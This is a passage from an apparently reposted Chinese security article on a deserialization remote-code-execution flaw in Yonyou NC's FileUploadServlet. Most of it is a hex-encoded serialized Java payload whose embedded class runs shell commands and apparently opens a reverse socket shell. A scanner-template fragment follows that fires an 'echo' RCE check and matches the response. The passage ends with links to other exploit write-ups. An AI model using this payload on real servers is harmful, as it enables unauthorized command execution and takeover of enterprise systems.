726d6174206572726f72210c007f00800c013e013f0c014001410c008100820100106a6176612f6c616e672f5468726561640c008301420c0143008401000540404040400c008c008b0100076f732e6e616d650701440c0145008b0c0146011d01000377696e01000470696e670100022d6e0100176a6176612f6c616e672f537472696e674275696c6465720c01470148010005202d6e20340c0149011d0100022f63010005202d74203401000273680100022d6307014a0c014b014c0c008c014d0100116a6176612f7574696c2f5363616e6e657207014e0c014f01500c008301510100025c610c015201530c015401550c0156011d0c015701500c015800840100072f62696e2f73680c00830159010007636d642e6578650c008c015a01000f6a6176612f6e65742f536f636b65740c015b01220c0083015c0c015d015e0c015f01550701600c016101220c016201220701630c0164012d0c016500840c016601670c016801220c0169008401001d726576657273652065786563757465206572726f722c206d7367202d3e0c016a011d01000121010013726576657273652065786563757465206f6b210c008d008e010002413401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b01000e67657454687265616447726f757001001928294c6a6176612f6c616e672f54687265616447726f75703b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000d6765745375706572636c61737301000473697a650100032829490100152849294c6a6176612f6c616e672f4f626a6563743b0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b010008676574427974657301000428295b42010004545950450100114c6a6176612f6c616e672f436c6173733b0100042849295601000b6e6577496e7374616e636501001428294c6a6176612f6c616e672f4f626a6563743b0100116765744465636c617265644d6574686f64010007666f724e616d65010015676574436f6e74657874436c6173734c6f6164657201001928294c6a6176612f6c616e672f436c6173734c6f616465723b0100156a6176612f6c616e672f436c6173734c6f61646572010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100047472696d01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a0100077265706c616365010044284c6a6176612f6c616e672f4368617253657175656e63653b4c6a6176612f6c616e672f4368617253657175656e63653b294c6a6176612f6c616e672f537472696e673b01000573706c6974010027284c6a6176612f6c616e672f537472696e673b295b4c6a6176612f6c616e672f537472696e673b0100087061727365496e74010015284c6a6176612f6c616e672f537472696e673b294901000776616c75654f660100162849294c6a6176612f6c616e672f496e74656765723b010017284c6a6176612f6c616e672f52756e6e61626c653b295601000573746172740100106a6176612f6c616e672f53797374656d01000b67657450726f706572747901000b746f4c6f77657243617365010006617070656e6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e674275696c6465723b010008746f537472696e670100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b010028285b4c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b010018284c6a6176612f696f2f496e70757453747265616d3b295601000c75736544656c696d69746572010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f7574696c2f5363616e6e65723b0100076861734e65787401000328295a0100046e65787401000e6765744572726f7253747265616d01000764657374726f79010015284c6a6176612f6c616e672f537472696e673b2956010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b010008696e7456616c7565010016284c6a6176612f6c616e672f537472696e673b49295601000f6765744f757470757453747265616d01001828294c6a6176612f696f2f4f757470757453747265616d3b0100086973436c6f7365640100136a6176612f696f2f496e70757453747265616d010009617661696c61626c65010004726561640100146a6176612f696f2f4f757470757453747265616d0100057772697465010005666c757368010005736c656570010004284a29560100096578697456616c7565010005636c6f736501000a6765744d6573736167650021007e001d0001000f00020002007f008000000002008100820000000600010083008400020085000003d800080011000002982ab70001b80002b600034c2bb600041205b600064d2c04b600072c2bb60008c00009c000094e03360415042dbea2026a2d1504323a051905c70006a702561905b6000a3a061906120bb6000c9a000d1906120db6000c9a0006a702381905b60004120eb600064d2c04b600072c1905b600083a071907c1000f9a0006a702151907b600041210b600064d2c04b600072c1907b600083a071907b600041211b600064da700163a081907b60004b60013b600131211b600064d2c04b600072c1907b600083a071907b60004b600131214b600064da700103a081907b600041214b600064d2c04b600072c1907b600083a071907b600041215b600064d2c04b600072c1907b60008c00016c000163a0803360915091908b900170100a2016f19081509b9001802003a0a190ab600041219b600064d2c04b600072c190ab600083a0b190bb60004121a03bd001bb6001c190b03bd001db6001e3a0c190bb60004121f04bd001b5903122053b6001c190b04bd001d5903122153b6001ec000203a0d190dc70006a700ff2a190db60022b600233a0e190cb60004122404bd001b5903b2002553b6001c190c04bd001d5903bb0026591100c8b7002753b6001e572a1228b600293a0f190fb6002a3a07190f122b06bd001b5903122c535904b20025535905b2002553b6002d190706bd001d5903190e535904bb00265903b70027535905bb002659190ebeb7002753b6001e57190cb60004122e04bd001b5903190f53b6001c190c04bd001d5903190753b6001e57a7004f3a0f2a1230b600293a101910123104bd001b5903122c53b6002d191004bd001d5903190e53b6001e3a07190cb60004122e04bd001b5903191053b6001c190c04bd001d5903190753b6001e57a70017840901a7fe8ba700083a06a70003840401a7fd95b10008009700a200a5001200c500d300d6001201bd02310234002f0036003b028c002f003e0059028c002f005c007c028c002f007f0280028c002f02830289028c002f00010086000000ee003b0000000a0004000b000b000c0015000d001a000e002600100030001100360013003e001400450015005c001600670017006c001800740019007f001a008a001b008f001c0097001e00a2002100a5001f00a7002000b8002200bd002300c5002500d3002800d6002600d8002700e3002900e8002a00f0002b00fb002c0100002d010e002e011d002f0128003001330031013800320140003301590034017f003501840036018700380192003901bd003b01c5003c01cc003d020f003e023100430234003f02360040023e0041025e0042028000440283002e02890049028c0046028e0048029100100297004b0087000000040001002f000100880089000200850000003900020003000000112bb80032b04db80002b600342bb60035b000010000000400050033000100860000000e0003000000500005005100060052008700000004000100330001008a008b00010085000000b5000400040000006d2bc6000c12362bb600379900061238b02bb600394c2b123ab6003b99003e2b123a1236b6003c123db6003e4d2cbe059f0006123fb02a2c0332b500402a2c0432b80041b80042b50043bb0044592ab700454e2db600461247b02a2b123a1236b6003c12481236b6003cb60049b000000001008600000036000d00000058000d00590010005b0015005c001e005d002c005e0032005f00350061003c0062004900630052006400560065005900670001008c008b00010085000001ca000400090000012a124ab8004bb6004c4d2bb600394c014e013a042c124db6000c9900402b124eb6000c9900202b124fb6000c9a0017bb005059b700512bb600521253b60052b600544c06bd00205903122153590412555359052b533a04a7003d2b124eb6000c9900202b124fb6000c9a0017bb005059b700512bb600521256b60052b600544c06bd00205903125753590412585359052b533a04b800591904b6005a4ebb005b592db6005cb7005d125eb6005f3a051905b6006099000b1905b60061a7000512363a06bb005b592db60062b7005d125eb6005f3a05bb005059b700511906b600521905b6006099000b1905b60061a700051236b60052b600543a0619063a072dc600072db600631907b03a051905b600643a062dc600072db600631906b03a082dc600072db600631908bf0004009300fe0109002f009300fe011d000001090112011d0000011d011f011d0000000100860000006e001b0000006b0009006c000e006d0010006e0013006f001c0070002e00710042007300590075006b0076007f00780093007b009c007c00ae007d00c2007e00d4007f00fa008000fe0084010200850106008001090081010b00820112008401160085011a0082011d0084012300850001008d008e00010085000001830004000c000000f3124ab8004bb6004c124db6000c9a0010bb0020591265b700664ea7000dbb0020591267b700664eb800592db600683a04bb0069592b2cb6006ab7006b3a051904b6005c3a061904b600623a071905b6006c3a081904b6006d3a091905b6006e3a0a1905b6006f9a00601906b600709e0010190a1906b60071b60072a7ffee1907b600709e0010190a1907b60071b60072a7ffee1908b600709e001019091908b60071b60072a7ffee190ab600731909b60073140074b800761904b6007757a700083a0ba7ff9e1904b600631905b60078a700204ebb005059b700511279b600522db6007ab60052127bb60052b60054b0127cb0000200b800be00c1002f000000d000d3002f000100860000006e001b0000008e0010008f001d00910027009300300094003e009500530096006100970069009800710099007e009b0086009c0093009e009b009f00a800a100ad00a200b200a300b800a500be00a600c100a700c300a800c600aa00cb00ab00d000ae00d300ac00d400ad00f000af0001008f0084000100850000002a000300010000000e2a2ab400402ab40043b6007d57b10000000100860000000a0002000000b4000d00b50001009000000002009174000b646566696e65436c6173737571007e001a00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e00287371007e00137571007e0018000000017571007e001a0000000071007e001c7571007e001a0000000171007e001e7371007e00137571007e0018000000017571007e00180000000071007e00227571007e001a0000000171007e00247371007e000f7371007e0000770c000000003f4000000000000078737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000001077080000001000000000787878")}}    payloads:      rce:        - "echo 89eD9F481B"    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'status_code_1==200 && contains(body_1, "89eD9F481B")'

原文始发于微信公众号（揽月安全团队）：用友NC FileUploadServlet 反序列化rce漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

用友NC FileUploadServlet 反序列化rce漏洞

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

漏洞预警 | 大华智慧园区综合管理平台远程代码执行漏洞

发表评论

在线咨询

微信